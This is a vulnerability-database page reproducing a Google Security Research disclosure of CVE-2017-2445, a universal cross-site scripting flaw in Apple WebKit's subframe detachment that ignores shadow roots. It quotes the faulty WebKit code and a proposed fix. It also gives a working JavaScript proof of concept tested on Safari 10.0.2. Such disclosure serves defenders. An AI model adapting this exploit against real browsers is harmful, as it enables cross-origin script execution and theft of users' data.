Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Apple WebKit disconnectSubframes UXSS

Related Vulnerabilities: CVE-2017-2445  
Publish Date: 09 Apr 2017
Author: Google Security Research, lokihardt
Source 
                							

                Apple WebKit: UXSS via disconnectSubframes 

CVE-2017-2445


When an element is removed from a document, the function |disconnectSubframes| is called to detach its subframes(iframe tag, object tag, etc.).

Here is a snippet of |disconnectSubframes|.

void disconnectSubframes(ContainerNode& root, SubframeDisconnectPolicy policy)
{
    ...
    Vector<Ref<HTMLFrameOwnerElement>> frameOwners;

    if (policy == RootAndDescendants) {
        if (is<HTMLFrameOwnerElement>(root))
            frameOwners.append(downcast<HTMLFrameOwnerElement>(root));
    }

    collectFrameOwners(frameOwners, root);

    // Must disable frame loading in the subtree so an unload handler cannot
    // insert more frames and create loaded frames in detached subtrees.
    SubframeLoadingDisabler disabler(root);

    bool isFirst = true;
    for (auto& owner : frameOwners) {
        // Don't need to traverse up the tree for the first owner since no
        // script could have moved it.
        if (isFirst || root.containsIncludingShadowDOM(&owner.get()))
            owner.get().disconnectContentFrame();
        isFirst = false;
    }
}

The bug is that it doesn't consider |root|'s shadowroot. So any subframes in the shadowroot will be never detached.

It should be like:

    ...
    collectFrameOwners(frameOwners, root);

    if (is<Element>(root)) {
        Element& element = downcast<Element>(root);
        if (ShadowRoot* shadowRoot = element.shadowRoot())
            collectFrameOwners(frameOwners, *shadowRoot);
    }
    ...


PoC:
var d = document.body.appendChild(document.createElement("div"));
var s = d.attachShadow({mode: "open"});

var f = s.appendChild(document.createElement("iframe"));

f.onload = () => {
    f.onload = null;

    f.src = "javascript:alert(location)";

    var xml = `
<svg xmlns="<a href="http://www.w3.org/2000/svg" title="" class="" rel="nofollow">http://www.w3.org/2000/svg</a>">
<script>
document.documentElement.appendChild(parent.d);

</sc` + `ript>
<element a="1" a="2" />
</svg>`;

    var v = document.body.appendChild(document.createElement("iframe"));
    v.src = URL.createObjectURL(new Blob([xml], {type: "text/xml"}));
};

f.src = "<a href="https://abc.xyz/";" title="" class="" rel="nofollow">https://abc.xyz/";</a>

Tested on Safari 10.0.2(12602.3.12.0.1)


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started